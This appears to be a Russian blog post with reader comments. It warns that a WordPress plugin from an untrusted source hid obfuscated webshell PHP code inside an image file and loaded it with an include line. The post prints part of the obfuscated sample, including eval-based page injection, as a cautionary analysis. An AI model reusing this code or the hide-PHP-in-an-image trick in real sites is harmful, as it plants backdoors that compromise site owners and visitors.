Рассматривая внутренности одного из плагинов для wordpress, случайно залез в папку с изображениями и автоматически нажал на одном из них F3 (просмотр). И что же я увидел? Вот именно то что вы видите на скрине рядом — php-код, вместо ожидаемой картинки. Думаю очевидно что этот код кто-то хотел скрыть.
Ради интереса я решил проверить этот файл на virustotal, вот результат:
Всего 1 антивирус из 54 распознал в нем CPRAd79.Webshell. В одном из php файлов плагина был найден кусок кода, подключающий данный код:
<?php include('images/social.png'); ?>
Сам код похоже обфусцирован:
<?php error_reporting(0); ini_set('display_errors', 0);@ini_set('max_execution_time', 300);@set_time_limit(0);function XJmVaOhvhAQNoaACoDOM() { if (!defined('WP_OPTION_KEY')) { define('WP_OPTION_KEY', 'wp_data_newa'); $oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(1); }}if (class_exists('JFactory')) { $fRBDRzVvkOhTDTWAHUGa = & JFactory::getApplication(); $fRBDRzVvkOhTDTWAHUGa->registerEvent('onAfterRender', 'XJmVaOhvhAQNoaACoDOM');}if ($GLOBALS['base_path'] || $GLOBALS['base_url']) { if (!defined('WP_OPTION_KEY')) { define('WP_OPTION_KEY', 'wp_data_newa'); $whjjnvouGqpgVFKDaceH = 'function ' . $template->name . "_page_alter(&\$page) {\$oXyaqmHoChvHQFCvTluq = new GsSYoMTsQibQgcHcuGmr(2); \$NygjKszxwCxlHbyDpHTT = \"\"; foreach (\$oXyaqmHoChvHQFCvTluq->oXyaqmHoChvHQFCvTluq['echo'] as \$stIedxfhoZcXvZNmNXTd) { \$NygjKszxwCxlHbyDpHTT.=\$stIedxfhoZcXvZNmNXTd; } \$vsGIQvwCXRbSELMOlFV = \$NygjKszxwCxlHbyDpHTT; \$page['page_top'][] = array('#markup' => \$vsGIQvwCXRbSELMOlFV); } "; } eval($whjjnvouGqpgVFKDaceH);}if (!defined('WP_OPTION_KEY') && (function_exists('get_home_url') || function_exists('get_site_url'))) { define('WP_OPTION_KEY', 'wp_data_newa'); new GsSYoMTsQibQgcHcuGmr(0);}class GsSYoMTsQibQgcHcuGmr { public $oXyaqmHoChvHQFCvTluq = array(), $yYVsqvOoqWsddypXgJcI = array(), $KPnBqYhemQSdHKDNtJpe, $qcCONSsvpJlMgdhEFFmr,
Я не буду подробно разбирать на что способен этот скрипт и как именно он работает, цель этой статьи — напомнить, что любой скачиваемый вами плагин или тема из непроверенных источников, сборников и особенно варезников, может содержать вредоносный код, который будучи не замеченным вами сразу, может доставить много неприятных минут в последствии. Антивирусы в данном случае не дают никаких гарантий, когда я проверил архив, то результат вообще был 0, и лишь когда я проверил конкретно этот файл, предварительно изменив расширение с png на php, всего один антивирус смог распознать заразу.
PS. Кому интересно, почитайте и второй пост — нашел целый сайт с зараженными темами wordpress. Метод похож, но код прячется в empty.gif.
Спасибо, дружище. Очень выручила статья.
Спасибо, помогло
Спасибо! Очень выручили. Будем изучать природу этой гадости.
Да, почему-то из всех шаблонов, понравились именно на wordpressorg.ru. И, конечно же, шаблон был с «содержимым».
Много всего ТАМ. Но изюминка — empty.gif.
Уничтожить ее — заменить
на